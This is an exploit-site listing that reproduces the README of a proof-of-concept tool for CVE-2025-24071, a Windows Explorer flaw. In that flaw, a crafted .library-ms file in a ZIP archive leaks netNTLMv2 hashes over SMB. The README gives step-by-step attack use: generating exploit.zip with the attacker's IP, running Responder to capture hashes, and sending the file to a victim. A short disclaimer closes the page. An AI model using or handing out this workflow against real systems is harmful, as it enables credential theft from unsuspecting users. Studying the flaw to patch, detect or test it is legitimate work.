Exploit for CVE-2025-24071

Name: Exploit for CVE-2025-24071
Rating: 5 (84 reviews)
2025-03-27 | CVSS 6.5
## https://sploitus.com/exploit?id=49F87252-D177-591F-8704-E0B883F32372
# CVE-2025-24071

This Python script is designed to demonstrate the **CVE-2025-24071** vulnerability in Windows Explorer. This vulnerability allows an attacker to capture **netNTLMv2** credentials from a victim without any direct interaction from the victim.

## Description

The **CVE-2025-24071** vulnerability exists in the way Windows handles `.library-ms` files inside ZIP archives. When a ZIP file containing a malicious `.library-ms` file is extracted, Windows automatically attempts to access an SMB location specified in the file, which may result in exposing the victim's credentials to the attacker's server.

This script generates a ZIP file containing a malicious `.library-ms` file. When a victim extracts the ZIP file, the system automatically tries to connect to the SMB location specified in the file, sending **netNTLMv2** credentials to the attacker without any interaction from the victim.

## How It Works

1. The script takes the **attacker's IP address** as an argument and inserts it into an XML file that defines a `.library-ms` file. This file instructs Windows to connect to a shared resource at the attacker's IP address.
   
2. The `.library-ms` file is then placed inside a ZIP file named `exploit.zip`.

3. When the victim extracts the ZIP file, Windows processes the `.library-ms` file and, due to the vulnerability, automatically establishes an SMB connection to the attacker's server.

4. The attacker can capture the **netNTLMv2** credentials using tools like **Responder**, without the victim needing to take any action.

## Requirements

- Python 3.x
- Modules: `zipfile`, `os`, `argparse`

## Usage

1. **Generate the malicious file**:

```bash
python exploit.py --ip <ATTACKER_IP>
```

2. Once the malicious file is generated, ensure that Responder is running and listening for the **netNTLMv2** hashes.

```bash
responder -I <INTERFACE>
```

3. Send the generated `exploit.zip` file to the victim. When they extract the file, Windows will attempt to connect to the SMB server specified in the `.library-ms` file.

4. Once the victim extracts the ZIP file and Windows attempts the SMB connection, **Responder** will capture the **netNTLMv2** hashes from the victim.

## Disclaimer

This script is intended for educational and testing purposes in controlled environments. The malicious use of this vulnerability may be illegal and against the laws and regulations of many countries. Use this script only on systems that you have permission to audit and always with proper authorization.